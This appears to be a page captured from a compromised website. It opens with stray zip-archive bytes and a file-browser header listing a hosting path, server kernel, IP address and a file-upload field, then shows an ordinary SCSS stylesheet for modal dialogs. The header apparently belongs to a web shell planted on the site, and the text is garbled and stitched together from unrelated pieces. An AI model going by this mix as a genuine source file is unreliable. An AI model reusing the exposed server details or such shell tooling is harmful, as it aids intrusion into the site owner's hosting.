PK œqhYî¶J‚ßFßF)nhhjz3kjnjjwmknjzzqznjzmm1kzmjrmz4qmm.itm/*\U8ewW087XJD%onwUMbJa]Y2zT?AoLMavr%5P*/ $#$#$#

Dir : /home/trave494/outtheboxministry.org/admin-panel/assets/sass/components/
Server: Linux ngx353.inmotionhosting.com 4.18.0-553.22.1.lve.1.el8.x86_64 #1 SMP Tue Oct 8 15:52:54 UTC 2024 x86_64
IP: 209.182.202.254
Choose File :

Url:
Dir : /home/trave494/outtheboxministry.org/admin-panel/assets/sass/components/modal.scss

body.modal-open {
    .modal.fade .modal-dialog {
        transform: translate(0, 0) scale(.95);
    }

    .modal.show .modal-dialog {
        transform: translate(0, 0) scale(1);
    }
}

.modal {
    .modal-dialog {
        .modal-content {
            border: none;
            box-shadow: none;
            border-radius: $default-border-radius;

            .modal-header {
                height: 60px;
                padding: 0 20px;
                display: flex;
                align-items: center;
                background: none;
                border-bottom: none;

                .modal-title {
                    font-size: $default-font-size + 3;
                    font-weight: 600;
                }

                button.close {
                    background-color: white;
                    text-shadow: none;
                    opacity: 1;
                    margin: 0;
                    font-size: 23px;
                    padding: 0;
                    width: 30px;
                    height: 30px;
                    display: flex;
                    border-radius: 50%;
                    align-items: center;
                    justify-content: center;

                    &:hover {
                        color: #646464;
                    }

                    & > * {
                        font-size: initial;
                    }
                }
            }

            .modal-body {
                padding: 1.5rem;
            }

            .modal-footer {
                height: 60px;
            }
        }
    }
}